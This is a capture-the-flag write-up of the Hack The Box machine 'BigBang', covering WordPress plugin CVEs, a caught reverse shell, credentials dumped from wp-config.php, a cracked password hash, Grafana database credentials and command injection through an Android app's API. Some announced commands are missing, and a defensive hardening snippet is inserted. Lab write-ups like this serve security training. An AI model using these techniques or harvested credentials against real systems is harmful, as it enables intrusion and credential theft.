BigBang is a hard-difficulty machine from Hack The Box. The initial foothold chains two vulnerabilities through the BuddyForms 2.7.7 WordPress plugin: CVE-2023-26326, an unauthenticated insecure deserialization issue in BuddyForms, and CVE-2024-2961, a buffer overflow in the glibc iconv function. This grants us shell access to the system, where we exfiltrate credentials first from the WordPress config file and later from a Grafana database file. Finally, after thoroughly analysing an Android application, we abuse an API endpoint that is vulnerable to command injection.
Reconnaissance
PS C:\Users\0xkujen> nmap -A -Pn 10.10.11.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-29 10:34 W. Central Africa Standard Time
Nmap scan report for 10.129.50.39
Host is up (0.17s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
|_  256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.62
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
Service Info: Host: blog.bigbang.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.40 seconds
Only the usual SSH (22) and HTTP (80) ports are open, and the web server redirects to http://blog.bigbang.htb/, so we add an entry for that hostname to our /etc/hosts file.
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.29] from (UNKNOWN) [10.10.11.52] 50590
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8e3a72b5e980:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@8e3a72b5e980:/var/www/html/wordpress/wp-admin$
Lateral Movement - Database Credentials exfiltration
Looking for database configuration files, we find the usual wp-config.php:
www-data@8e3a72b5e980:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wp_user' );

/** Database password */
define( 'DB_PASSWORD', 'wp_password' );

/** Database hostname */
define( 'DB_HOST', '172.17.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to login again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '(6xl?]9=.f9(<(yxpm9]5<wKsyEc+y&MV6CjjI(0lR2)_6SWDnzO:[g98nOOPaeK' );
define( 'SECURE_AUTH_KEY',  'F<3>KtCm^zs]Mxm Rr*N:&{SWQexFn@ wnQ+bTN5UCF-<gMsT[mH$m))T>BqL}%8' );
define( 'LOGGED_IN_KEY',    ':{yhPsf}tZRfMAut2$Fcne/.@Vs>uukS&JB04 Yy3{`$`6p/Q=d^9=ZpkfP,o%l]' );
define( 'NONCE_KEY',        'sC(jyKu>gY(,&: KS#Jh7x?/CB.hy8!_QcJhPGf@3q<-a,D#?!b}h8 ao;g[<OW;' );
define( 'AUTH_SALT',        '_B& tL]9I?ddS! 0^_,4M)B>aHOl{}e2P(l3=!./]~v#U>dtF7zR=~LnJtLgh&KK' );
define( 'SECURE_AUTH_SALT', '<Cqw6ztRM/y?eGvMzY(~d?:#]v)em`.H!SWbk.7Fj%b@Te<r^^Vh3KQ~B2c|~VvZ' );
define( 'LOGGED_IN_SALT',   '_zl+LT[GqIV{*Hpv>]H:<U5oO[w:]?%Dh(s&Tb-2k`1!WFqKu;elq7t^~v7zS{n[' );
define( 'NONCE_SALT',       't2~PvIO1qeCEa^+J}@h&x<%u~Ml{=0Orqe]l+DD7S}%KP}yi(6v$mHm4cjsK,vCZ' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
It contains the MySQL credentials for the wp_user account (wp_user:wp_password). To use them we forward the MySQL service (port 3306) to our attacker machine with chisel and connect from there. First, on our attacker machine:
We can now use MySQL Workbench to connect using those credentials:
We can now execute the following commands to get the shawking user's hash:
Next we crack the hash using John the Ripper:
┌──(kali㉿kali)-[~]
└─$ john --format=phpass -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
quantumphysics   (?)
1g 0:00:02:33 DONE (2025-01-31 20:05) 0.006532g/s 29099p/s 29099c/s 29099C/s quarashi33..quanteka
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
We can now use that password to SSH into the box as shawking and claim the user flag:
shawking@bigbang:~$ id
uid=1001(shawking) gid=1001(shawking) groups=1001(shawking)
shawking@bigbang:~$ cat user.txt
843380241da5d7490f87e3c709fbbbb2
shawking@bigbang:~$
Lateral Movement to developer - Grafana Database Exfiltration
Looking at the /opt directory, we find an interesting data folder containing a grafana.db database file:
-bash-5.1$ id
uid=1001(shawking) gid=1001(shawking) groups=1001(shawking)
-bash-5.1$ ls
csv  grafana.db  pdf  plugins  png
We copy it to our attacker machine with scp and inspect it:
Started: Fri Jan 31 20:27:43 2025
Stopped: Fri Jan 31 20:28:09 2025
developer:bigbang
-bash-5.1$ su developer
Password:
bash-5.1$ id
uid=1002(developer) gid=1002(developer) groups=1002(developer)
bash-5.1$
Privilege Escalation to root - command injection in Android App
In developer's home directory we find an android folder containing satellite-app.apk:
bash-5.1$ pwd
/home/developer/android
bash-5.1$ ls
satellite-app.apk
We can transfer that to our machine and open it with jadx:
The decompiled code shows that the app talks to two API endpoints, /login and /command; /command is vulnerable to command injection through malicious input in the output_file parameter.
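As an added illustration (the page does not reproduce the API's own code), here is the shape of that bug in a hypothetical Python handler next to a hardened version: the output_file value is only ever treated as a filename pinned inside a fixed directory, and the tool is started from an argv list without a shell. The tool name, output directory and handler functions are assumptions.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Hypothetical stand-in for the API's /command handler (not the box's real code).
OUTPUT_DIR = Path(tempfile.gettempdir()) / "satellite-out"
# Allow-list: alphanumeric first char, then a bounded set of safe filename chars.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def vulnerable_command_line(output_file: str) -> str:
    """Shape of the bug: the parameter is pasted into a shell string, so any shell
    metacharacter in output_file becomes part of the command the server runs."""
    return f"satellite-tool --out {output_file}"  # hypothetical tool name


def safe_output_path(output_file: str) -> Path:
    """Reject anything outside the allow-list and anything that leaves OUTPUT_DIR."""
    if not SAFE_NAME.fullmatch(output_file):
        raise ValueError(f"rejected output_file: {output_file!r}")
    path = (OUTPUT_DIR / output_file).resolve()
    if path.parent != OUTPUT_DIR.resolve():
        raise ValueError("output_file escapes the output directory")
    return path


def run_hardened(output_file: str, argv=("echo", "report")) -> int:
    """Hardened handler: validated path, fixed argv, no shell, user input never parsed as a command."""
    path = safe_output_path(output_file)
    OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
    with open(path, "w") as fh:
        # argv is chosen by the server; the filename is used only as a file to write into.
        return subprocess.run(list(argv), stdout=fh, shell=False, check=False).returncode
```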
We can therefore craft a script that abuses this injection to set the SUID bit on the /bin/bash binary: